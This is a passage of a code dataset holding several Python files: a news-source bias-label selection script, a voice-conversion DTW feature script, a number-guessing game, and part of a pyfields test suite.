list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Right'])\n# labeled: left\nallsides_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Left'])\n\nallsides_sources = allsides_center + allsides_lean_left + allsides_lean_right \\\n + allsides_left + allsides_right\nallsides_bias_labels = len(allsides_center) * ['Center'] \\\n + len(allsides_lean_left) * ['Lean Left'] \\\n + len(allsides_lean_right) * ['Lean Right'] \\\n + len(allsides_left) * ['Left'] \\\n + len(allsides_right) * ['Right']\n\n\nnum_allsides_outlets = len(allsides_bias_labels)\n\n# saving to csv\nallsides_sources_with_labels = pd.DataFrame({'Source': allsides_sources,\n 'bias':allsides_bias_labels})\n\nallsides_sources_with_labels.to_csv(os.path.join('allsides_data', 'allsides_bias_labels.csv'), index=False)\n\n\n##### MediaBias/FactCheck dataset 
(disregarded) ###################################\n\n# labeled: least biased\nmbfc_least_biased = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='least_biased'])\n# labeled: left bias\nmbfc_left_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_bias'])\n# labeled: right bias\nmbfc_right_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_bias'])\n# labeled: left center bias\nmbfc_left_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_center_bias'])\n# labeled: right center bias\nmbfc_right_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_center_bias'])\n# variable: extreme left\nmbfc_extreme_left = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_left']==1]['Source'])\n# variable: extreme right\nmbfc_extreme_right = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_right']==1]['Source'])\n\nmbfc_sources = mbfc_least_biased + mbfc_left_bias + mbfc_right_bias \\\n + mbfc_left_center_bias + mbfc_right_center_bias \\\n + mbfc_extreme_left + mbfc_extreme_right\n\nmbfc_bias_labels = len(mbfc_least_biased) * ['least_biased'] \\\n + len(mbfc_left_bias) * ['left_bias'] \\\n + len(mbfc_right_bias) * ['right_bias'] \\\n + len(mbfc_left_center_bias) * ['left_center_bias'] \\\n + len(mbfc_right_center_bias) * ['right_center_bias'] \\\n + len(mbfc_extreme_left) * ['extreme_left'] \\\n + len(mbfc_extreme_right) * ['extreme_right'] \n\nnum_mbfc_outlets = len(mbfc_bias_labels)\n\nmbfc_sources_with_labels = pd.DataFrame({'Source': mbfc_sources,\n 'bias':mbfc_bias_labels})\n# saving to csv\nmbfc_sources_with_labels.to_csv('mbfc_full/mbfc_full_for_counting_bias_labels.csv', index=False)\n\n\n##### SQL commands ################################################################\n#############################################\nsql_sources = allsides_sources # mbfc_sources\n#############################################\nsql_string = 'DELETE FROM articles WHERE '\nfor i,source in enumerate(mbfc_sources):\n if i != len(mbfc_sources) -1:\n sql_string +='NOT source=' + \"'\" + source + \"'\"+ ' AND '\n else: \n sql_string +='NOT source=' + \"'\" + source + \"'\"\n\nprint(sql_string)\n","repo_name":"Tobias-K93/media-bias-prediction","sub_path":"data_preparation/0_select_news_sources.py","file_name":"0_select_news_sources.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
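One detail worth noting in the record above: sql_sources is assigned allsides_sources, but the loop that builds the DELETE statement iterates mbfc_sources, so the marked selection has no effect on the generated SQL. A hedged sketch of the presumably intended construction, reusing the record's own variables:

sql_string = "DELETE FROM articles WHERE " + " AND ".join(
    "NOT source='{}'".format(source) for source in sql_sources
)
print(sql_string)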
+{"seq_id":"27696098817","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Created on 9:21 AM 11/30/18\n @author: ngunhuconchocon\n @brief: This script is made to construct frame-wise dictionary between src and tar spectra\n For short, it create dicts of exemplars ( a_i, b_i pairs)\n\"\"\"\n\nfrom __future__ import print_function\nfrom tqdm import tqdm\n\nfrom utils import config_get_config, logdir, io_read_speaker_data, io_save_to_disk\n\nimport pickle\nimport configparser\n\nimport os\nimport pdb\n\nimport librosa as lbr\nimport pysptk\nfrom dtw import dtw\nfrom fastdtw import fastdtw\n# from dtaidistance.dtw import distance_fast, best_path, best_path2, warping_paths\nfrom librosa import display\n\nimport pyworld as pw\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# for debugging\nimport logging\nimport cProfile\nimport datetime\nimport itertools\nimport time\n\nfrom multiprocessing import Pool, cpu_count\n\n\nlogging.basicConfig(\n filename=\"logs/\" + \":\".join(str(datetime.datetime.now()).split(\":\")[:-1]),\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n)\n\ntry:\n import coloredlogs\n coloredlogs.install(level=logging.DEBUG, fmt='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s')\nexcept ModuleNotFoundError:\n pass\n\n# parse the configuration\nargs = config_get_config(\"config/config\")\n\nframe_length = int(args['feat_frame_length'])\noverlap = float(args['feat_overlap'])\n# hop_length = int(frame_length * overlap) + 300\nhop_length = int(args['feat_hop_length'])\norder = int(args['feat_order'])\nalpha = float(args['feat_alpha'])\ngamma = float(args['feat_gamma'])\n\ndata_path = args['DataPath']\nspeakerA = args['SpeakerA']\nspeakerB = args['SpeakerB']\nfeature_path = args['feature_path']\nsr = int(args['sampling_rate'])\n\nf0_floor = int(args['f0_floor'])\n\ncpu_rate = float(args['cpu_rate'])\nnb_file = int(args['nb_file'])\n\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n\nlogging.info(\"{}% cpu resources ({} cores) will be used to run this script\".format(cpu_rate * 100, int(cpu_rate * cpu_count())))\nlogging.info(\"START EXTRACTING ...\")\n\n\n# This is wrong (as we need MCEP, not MFCC). Nevertheless, preserving this is necessary.\n# Updated 2018 Dec 14: Edit feat_mfccs to extract_features, with multiple choice of choosing feature to extract. Default is mcep\n# TODO feat argument need to be implement as a list, support multiple feature-type return\ndef _extract_features(audiodatum, speaker, sr=16000, feat='mcep'):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Feature extraction. For each type of feature, see corresponding case below\n Currently support: MCEP, MFCC. Will be updated when needed\n :param audiodatum: 162 files time-series data\n :param sr: sampling rate.\n :param feat: type of currently supported feature\n :return:\n \"\"\"\n if feat.lower() == 'mfcc':\n \"\"\"\n extract mfcc from audio time series data (from librosa.load)\n \"\"\"\n # mfcc = lbr.util.normalize(lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length), norm=1, axis=0)\n mfcc = lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length)\n\n # return np.stack(mfccs)\n return mfcc\n\n elif feat.lower() == 'mcep' or feat.lower() == 'mcc':\n \"\"\" \n MCEP is extracted via pysptk. 
See the link below for more details\n https://github.com/eYSIP-2017/eYSIP-2017_Speech_Spoofing_and_Verification/wiki/Feature-Extraction-for-Speech-Spoofing\n \n Example of using pysptk to extract mcep (copied from the above link): \n frameLength = 1024\n overlap = 0.25\n hop_length = frameLength * overlap\n order = 25\n alpha = 0.42\n gamma = -0.35\n \n sourceframes = librosa.util.frame(speech, frame_length=frameLength, hop_length=hop_length).astype(np.float64).T\n sourceframes *= pysptk.blackman(frameLength)\n sourcemcepvectors = np.apply_along_axis(pysptk.mcep, 1, sourceframes, order, alpha)\n \"\"\"\n # Check if data exists\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n frame = lbr.util.frame(audiodatum, frame_length=frame_length, hop_length=hop_length).T\n frame *= pysptk.blackman(frame_length)\n\n mcep = np.apply_along_axis(pysptk.mcep, 1, frame, order=order, alpha=alpha).T\n\n # Save to .pkl for later load\n # Move to calculating multiprocess call.\n # with open(temp_filename, \"wb\") as f:\n # pickle.dump(mceps, f, protocol=3)\n\n return mcep\n else:\n logging.critical('{} feature is not supported yet, exiting ...')\n exit()\n\n\ndef extract_features(audiodata, speaker, sr=16000, feat='mcep'):\n \"\"\"\n This will use multiprocess.Pool to parallel call _extract_features\n\n For example\n from multiprocessing import Pool\n p = Pool(5)\n def f(x):\n return x*x\n p.map(f, [1,2,3])\n\n :param audiodata:\n :param speaker:\n :param sr:\n :param feat:\n :return:\n \"\"\"\n # print(\"=======================\")\n logging.info(\"Extracting {} from {}'s data ...\".format(feat, speaker))\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n if os.path.isfile(temp_filename):\n logging.info(\"Found {}. Load data from {}_{}\".format(temp_filename, speaker, feat))\n\n with open(temp_filename, \"rb\") as f:\n return pickle.load(f), feat\n else:\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n\n results = p.starmap(_extract_features, zip(audiodata, itertools.repeat(speaker), itertools.repeat(sr), itertools.repeat(feat)))\n\n # print(feat)\n with open(temp_filename, \"wb\") as f:\n pickle.dump(results, f, protocol=3)\n\n return results, feat\n # raise NotImplementedError\n\n\n# EDIT 2018 Dec 17: This function will be removed. It will later be split to 3 separated function: `make_A`, `make_R`, `make_W`\n# See commit 4b0d1d716821934afb53b086bb9e351cc5d53f5b for \"before separating behavior\"\ndef make_dict_from_feat(feat_A, feat_B):\n \"\"\"\n Final function: return the \"dictionary\" of exemplars, which is construct by alignment of DTW\n Tentative: return a list, each item is a tuple size of 2, which is A and B, for src and tar speaker\n :param dtw_path: path[0], path[1]\n :return:\n \"\"\"\n dtw_paths = []\n\n for i in range(len(feat_A)):\n # dist, cost, cum_cost, path = dtw(feat_A[i].T, feat_B[i].T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, path = fastdtw(feat_A[i].T, feat_B[i].T, dist=lambda x, y: np.linalg.norm(x - y, ord=1))\n dtw_paths.append(path)\n\n exemplars = []\n for idx_file, path in tqdm(enumerate(dtw_paths)):\n a = []\n b = []\n\n for it in range(len(path[0])):\n try:\n a.append(feat_A[idx_file].T[path[0][it]])\n b.append(feat_B[idx_file].T[path[1][it]])\n except Exception as e:\n input(\"Error occur. 
Press any key to exit ...\")\n exit()\n\n exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n return exemplars\n\n\ndef _dtw_alignment(feat_A, feat_B):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :param feat_B: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :return: dtw path of 1 file\n \"\"\"\n logging.info(\"DTW on MCEP: Calculating warping function ...\")\n\n # dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: sum(np.square(x - y)))\n\n return path\n\n\ndef dtw_alignment(feat_full_A, feat_full_B):\n \"\"\"\n This will use multiprocess.Pool to parallel call _dtw_alignment\n\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: shape of (162 audio file, ...)\n :param feat_B: shape of (162 audio file, ...)\n :return: dtw path of 162 file\n \"\"\"\n logging.info(\"Parallel: DTW on MCEP: Calculating warping function ...\")\n\n # For parallel\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n dtw_paths = p.starmap(_dtw_alignment, zip(feat_full_A, feat_full_B))\n\n logging.info(\"Finish aligning. Warping mcep .... \")\n\n return dtw_paths, None, None\n\n # exemplars = []\n # full_A = []\n # full_B = []\n # for idx_file, path in tqdm(enumerate(dtw_paths)):\n # a = []\n # b = []\n #\n # for it in range(len(path[0])):\n # try:\n # a.append(feat_A[idx_file].T[path[0][it]])\n # b.append(feat_B[idx_file].T[path[1][it]])\n # except Exception as e:\n # input(\"Error occur. 
Press any key to exit ...\")\n # exit()\n #\n # full_A.append(np.asarray(a))\n # full_B.append(np.asarray(b))\n # # exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n #\n # return dtw_paths, full_A, full_B\n\n\ndef make_exemplar_dict_A(dtw_paths, feat_A):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n A_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_A[idx][path[1][i]])\n\n A_exemplars_dict.append(np.asarray(temp))\n\n return A_exemplars_dict\n\n\ndef make_exemplar_dict_W(dtw_paths):\n return [path[0] for path in dtw_paths], [path[1] for path in dtw_paths]\n\n\ndef make_exemplar_dict_R(dtw_paths, feat_B):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n R_exemplars_dict = []\n B_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_B[idx][path[1][i]])\n\n B_exemplars_dict.append(np.asarray(temp))\n\n print(B_exemplars_dict[0].shape)\n for idx, exemplar in enumerate(B_exemplars_dict):\n temp = []\n for jjj in range(len(exemplar)):\n temp.append(np.exp(np.log(np.clip(feat_B[idx][jjj], 1e-10, None) - np.log(np.clip(exemplar[jjj], 1e-10, None)))))\n\n R_exemplars_dict.append(np.asarray(temp))\n\n return R_exemplars_dict\n\n# End of 2018 Dec 17 editing\n\n\n# EDIT: Add pickling exemplar dictionaries\ndef io_save_exemplar_dictionaries(exemplar_dict, protocol=3, savepath=\"data/vc/exem_dict\"):\n \"\"\"\n This function pickles every variables (exemplar dictionaries in this case) in args\n :param exemplar_dict:\n :param protocol:\n :param savepath:\n :return:\n \"\"\"\n os.system(\"mkdir -p {}\".format(savepath))\n\n for filename, value in exemplar_dict.items():\n with open(os.path.join(savepath, filename), \"wb\") as f:\n pickle.dump(value, f, protocol=protocol)\n\n logging.info(\"Done pickling warping function!!! Files are saved in data/vc/exem_dict/exemplar_W_A and B\")\n # raise NotImplementedError\n\n\ndef final_make_dict():\n # TODO should add argument to python call\n # TODO to specify which speaker to cover\n\n # Read audio time-series from npy\n logging.info(\"===================================================\")\n logging.info(\"Start reading audio time-series ...\")\n speakerAdata = io_read_speaker_data(data_path, speakerA, savetype='npy', parallel=True)[:nb_file]\n speakerBdata = io_read_speaker_data(data_path, speakerB, savetype='npy')[:nb_file]\n\n # Extract features from time-series FOR DTW-ALIGNMENT (f0, sp, ap is not included here)\n logging.info(\"===================================================\")\n logging.info(\"Start extracting mel feature for dtw alignment ...\")\n # feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mcep')\n # feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mcep')\n feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mfcc')\n feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mfcc')\n assert feat_type_A == feat_type_B, \"Inconsistent feature type. 2 speaker must have the same type of extracted features.\"\n\n # Get dtw path. 
Note that feat_A and feat_B will be transposed to (n_frames, mel-cepstral order) shape\n logging.info(\"===================================================\")\n logging.info(\"Start aligning (with dtw) ...\")\n dtw_paths, feat_A, feat_B = dtw_alignment(feat_A, feat_B)\n\n # exemplar_A = make_exemplar_dict_A(dtw_paths, feat_A)\n # exemplar_R = make_exemplar_dict_R(dtw_paths, feat_B)\n logging.info(\"===================================================\")\n exemplar_W_A, exemplar_W_B = make_exemplar_dict_W(dtw_paths)\n\n logging.info(\"Save dtw-paths to .pkl\")\n io_save_exemplar_dictionaries({\n # 'exemplar_A': exemplar_A,\n # 'exemplar_R': exemplar_R,\n 'exemplar_W_A': exemplar_W_A,\n 'exemplar_W_B': exemplar_W_B\n })\n\n # exemplars = make_dict_from_feat(feat_A, feat_B)\n # print(exemplars[0].shape, exemplars[1].shape)\n #\n # # Dump to npy\n # os.system(\"mkdir -p \" + feature_path)\n # # with open(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc_25ms_10ms_norm\" + \".pkl\"), \"wb\") as f:\n # with open(os.path.join(feature_path, \"{}2{}_{}_{}ms_{}ms.pkl\".format(\n # speakerA, speakerB, 'mcep', int(frame_length * 1000 / sr), int(hop_length * 1000 / sr))), \"wb\") as f:\n # pickle.dump(exemplars, f, protocol=3)\n\n # np.save(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc\" + \".npy\"), exemplars)\n\n\ndef debug_profiling_main():\n start = time.time()\n cProfile.run('final_make_dict()')\n logging.info(\"Elapsed time: {}\".format(time.time() - start))\n\n\nif __name__ == \"__main__\":\n final_make_dict()\n # cProfile.run('final_make_dict()', )\n","repo_name":"entn-at/exemplars_vc","sub_path":"01_make_dict_parallel.py","file_name":"01_make_dict_parallel.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
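The 01_make_dict_parallel.py record builds exemplar dictionaries by indexing frames along a DTW path. A minimal, self-contained sketch of that alignment step with random stand-in features (illustrative shapes; the fastdtw call mirrors the one in make_dict_from_feat):

import numpy as np
from fastdtw import fastdtw

feat_a = np.random.rand(40, 25)   # (n_frames, mcep order) for the source speaker
feat_b = np.random.rand(55, 25)   # (n_frames, mcep order) for the target speaker

dist, path = fastdtw(feat_a, feat_b, dist=lambda x, y: np.linalg.norm(x - y, ord=1))

# The warping path pairs one source frame with one target frame per step,
# which is exactly what the exemplar (a_i, b_i) pairs are made of.
aligned_a = np.stack([feat_a[i] for i, _ in path])
aligned_b = np.stack([feat_b[j] for _, j in path])
assert aligned_a.shape == aligned_b.shape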
+{"seq_id":"1733569132","text":"#Guess the number the computer has in mind.\nimport random\n\ndef guess(num,allowedCount):\n randomNum = random.randint(1, num)\n guess = 0\n count = 0\n while guess != randomNum and count != allowedCount:\n guess = int(input(\"Guess the number: \"))\n count += 1\n tries = allowedCount - count\n if guess < randomNum:\n print(f\"Guess again, value is too low. You have {tries} tries left!\")\n elif guess > randomNum:\n print(f\"Guess again, value is too high. You have {tries} tries left!\")\n if guess != randomNum and count == allowedCount:\n print(f\"Better Luck Next Time, the value was {randomNum}.\")\n else:\n print(f'Congratulations!!!, You have guessed {randomNum} correctly in {count} tries!!!')\n\ndef guessComp(num):\n low = 1\n high = num\n feedback = \"\"\n count = 0\n while feedback != \"c\":\n if low != high:\n guess = random.randint(low,high)\n else:\n guess = low\n count += 1\n feedback = input(f\"The computer guessed {guess}. is it higher(H), lower(L) or Correct(C)??\").lower()\n if feedback == 'h':\n high = guess - 1\n elif feedback == 'l':\n low = guess + 1\n print(f\"The computer found your number ({guess}) in {count} tries!!!\")\n\nprint(\"GUESS THE NUMBER\")\nprint('Select a level of difficulty \\n \\\npress 1 for Easy \\n \\\npress 2 for Medium \\n \\\npress 3 for Hard \\n\\n \\\npress 5 to play Computer guess your number')\n\ntry:\n level = int(input())\n if level == 1:\n print('Easy Difficulty - 1 to 10 \\n You have 3 Guesses.')\n guess(10,3)\n elif level == 2:\n print('Medium Difficulty - 1 to 40 \\n You have 5 Guesses.')\n guess(40,5)\n elif level ==3:\n print('Hard Difficulty - 1 to 100 \\n You have 5 Guesses.')\n guess(100,5)\n elif level == 5:\n high = int(input('Provide the range which include your number: '))\n guessComp(high)\n else:\n print(\"Please make a valid selection.\")\nexcept:\n print(\"Enter a valid input\")\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Python/Guess_the_number.py","file_name":"Guess_the_number.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"}
+{"seq_id":"34752264654","text":"import os\nimport sys\nimport timeit\n\nimport pytest\nfrom valid8 import ValidationError, ValidationFailure\n\nfrom pyfields import field, MandatoryFieldInitError, make_init, init_fields, ReadOnlyFieldError, NoneError, \\\n FieldTypeError, autoclass, get_fields\n\n\ndef test_lazy_fields():\n\n class Wall(object):\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # create an instance\n w = Wall()\n\n # the field is visible in `dir`\n assert dir(w)[-2:] == ['color', 'height']\n\n # but not yet in `vars`\n assert vars(w) == dict()\n\n # lets ask for it - default value is affected\n print(w.color)\n\n # now it is in `vars` too\n assert vars(w) == {'color': 'white'}\n\n # mandatory field\n with pytest.raises(MandatoryFieldInitError) as exc_info:\n print(w.height)\n assert str(exc_info.value).startswith(\"Mandatory field 'height' has not been initialized yet on instance <\")\n\n w.height = 12\n assert vars(w) == {'color': 'white', 'height': 12}\n\n\n@pytest.mark.parametrize(\"use_decorator\", [False, True], ids=\"use_decorator={}\".format)\ndef test_default_factory(use_decorator):\n\n class BadPocket(object):\n items = field(default=[])\n\n p = BadPocket()\n p.items.append('thing')\n g = BadPocket()\n assert g.items == ['thing']\n\n if use_decorator:\n class Pocket:\n items = field()\n\n @items.default_factory\n def default_items(self):\n return []\n else:\n class Pocket(object):\n items = field(default_factory=lambda obj: [])\n\n p = Pocket()\n g = Pocket()\n p.items.append('thing')\n assert p.items == ['thing']\n assert g.items == []\n\n\ndef test_readonly_field():\n \"\"\" checks that the example in the readme is correct \"\"\"\n\n class User(object):\n name = field(read_only=True)\n\n u = User()\n u.name = \"john\"\n assert \"name: %s\" % u.name == \"name: john\"\n with pytest.raises(ReadOnlyFieldError) as exc_info:\n u.name = \"john2\"\n qualname = User.__dict__['name'].qualname\n assert str(exc_info.value) == \"Read-only field '%s' has already been \" \\\n \"initialized on instance %s and cannot be modified anymore.\" % (qualname, u)\n\n class User(object):\n name = field(read_only=True, default=\"dummy\")\n\n u = User()\n assert \"name: %s\" % u.name == \"name: dummy\"\n with pytest.raises(ReadOnlyFieldError):\n u.name = \"john\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_type_validation(py36_style_type_hints):\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_type_validation\n Wall = _test_readme_type_validation()\n else:\n class Wall(object):\n height = field(type_hint=int, check_type=True, doc=\"Height of the wall in mm.\")\n color = field(type_hint=str, check_type=True, default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 1\n with pytest.raises(TypeError):\n w.height = \"1\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation(py36_style_type_hints):\n colors = ('blue', 'red', 'white')\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_value_validation\n Wall = 
_test_readme_value_validation(colors)\n\n from mini_lambda import x\n from valid8.validation_lib import is_in\n\n class Wall(object):\n height = field(type_hint=int,\n validators={'should be a positive number': x > 0,\n 'should be a multiple of 100': x % 100 == 0},\n doc=\"Height of the wall in mm.\")\n color = field(type_hint=str,\n validators=is_in(colors),\n default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 100\n with pytest.raises(ValidationError) as exc_info:\n w.height = 1\n assert \"Successes: ['x > 0'] / Failures: {\" \\\n \"'x % 100 == 0': 'InvalidValue: should be a multiple of 100. Returned False.'\" \\\n \"}.\" in str(exc_info.value)\n\n with pytest.raises(ValidationError) as exc_info:\n w.color = 'magenta'\n assert \"NotInAllowedValues: x in ('blue', 'red', 'white') does not hold for x=magenta. Wrong value: 'magenta'.\" \\\n in str(exc_info.value)\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation_advanced(py36_style_type_hints):\n\n class InvalidWidth(ValidationFailure):\n help_msg = 'should be a multiple of the height ({height})'\n\n def validate_width(obj, width):\n if width % obj.height != 0:\n raise InvalidWidth(width, height=obj.height)\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import test_value_validation_advanced\n Wall = test_value_validation_advanced(validate_width)\n else:\n class Wall(object):\n height = field(type_hint=int,\n doc=\"Height of the wall in mm.\")\n width = field(type_hint=str,\n validators=validate_width,\n doc=\"Width of the wall in mm.\")\n\n w = Wall()\n w.height = 100\n w.width = 200\n\n with pytest.raises(ValidationError) as exc_info:\n w.width = 201\n assert \"InvalidWidth: should be a multiple of the height (100). 
Wrong value: 201.\" in str(exc_info.value)\n\ntry:\n from typing import Optional\n typing_present = True\nexcept ImportError:\n typing_present = False\n\n\n@pytest.mark.skipif(not typing_present, reason=\"typing module is not present\")\n@pytest.mark.parametrize(\"declaration\", ['typing', 'default_value', 'explicit_nonable'], ids=\"declaration={}\".format)\ndef test_nonable_fields(declaration):\n \"\"\"Tests that nonable fields are supported and correctly handled\"\"\"\n\n if declaration == 'typing':\n from typing import Optional\n \n class Foo(object):\n a = field(type_hint=Optional[int], check_type=True)\n b = field(type_hint=Optional[int], validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'default_value':\n class Foo(object):\n a = field(type_hint=int, default=None, check_type=True)\n b = field(type_hint=int, default=None, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'explicit_nonable':\n class Foo(object):\n a = field(type_hint=int, nonable=True, check_type=True)\n b = field(type_hint=int, nonable=True, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n else:\n raise ValueError(declaration)\n\n f = Foo()\n f.a = None\n f.b = None\n with pytest.raises(NoneError):\n f.c = None\n f.d = None\n f.e = None\n assert vars(f) == {'_a': None, '_b': None, '_d': None, 'e': None}\n\n\ndef test_native_descriptors():\n \"\"\"\"\"\"\n class Foo:\n a = field()\n b = field(native=False)\n\n a_name = \"test_native_descriptors..Foo.a\" if sys.version_info >= (3, 6) else \".None\"\n b_name = \"test_native_descriptors..Foo.b\" if sys.version_info >= (3, 6) else \".None\"\n assert repr(Foo.__dict__['a']) == \"\" % a_name\n assert repr(Foo.__dict__['b']) == \"\" % b_name\n\n f = Foo()\n\n def set_native(): f.a = 12\n\n def set_descript(): f.b = 12\n\n def set_pynative(): f.c = 12\n\n # make sure that the access time for native field and native are identical\n # --get rid of the first init since it is a bit longer (replacement of the descriptor with a native field\n set_native()\n set_descript()\n set_pynative()\n\n # --now compare the executiong= times\n t_native = timeit.Timer(set_native).timeit(10000000)\n t_descript = timeit.Timer(set_descript).timeit(10000000)\n t_pynative = timeit.Timer(set_pynative).timeit(10000000)\n\n print(\"Average time (ns) setting the field:\")\n print(\"%0.2f (normal python) ; %0.2f (native field) ; %0.2f (descriptor field)\"\n % (t_pynative, t_native, t_descript))\n\n ratio = t_native / t_pynative\n print(\"Ratio is %.2f\" % ratio)\n assert ratio <= 1.2\n\n\n# def decompose(number):\n# \"\"\" decompose a number in scientific notation. 
from https://stackoverflow.com/a/45359185/7262247\"\"\"\n# (sign, digits, exponent) = Decimal(number).as_tuple()\n# fexp = len(digits) + exponent - 1\n# fman = Decimal(number).scaleb(-fexp).normalize()\n# return fman, fexp\n\n\ndef test_make_init_full_defaults():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init()\n\n # create an instance\n help(Wall)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = Wall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_with_explicit_list():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # only `height` will be in the constructor\n __init__ = make_init(height)\n\n with pytest.raises(TypeError) as exc_info:\n Wall(1, 'blue')\n assert str(exc_info.value).startswith(\"__init__()\")\n\n\ndef test_make_init_with_inheritance():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n __init__ = make_init(height)\n\n class ColoredWall(Wall):\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init(Wall.height, color)\n\n w = ColoredWall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = ColoredWall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_callback():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n def post_init(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # only `height` and `foo` will be in the constructor\n __init__ = make_init(height, post_init_fun=post_init)\n\n w = Wall(1, 'hey')\n assert vars(w) 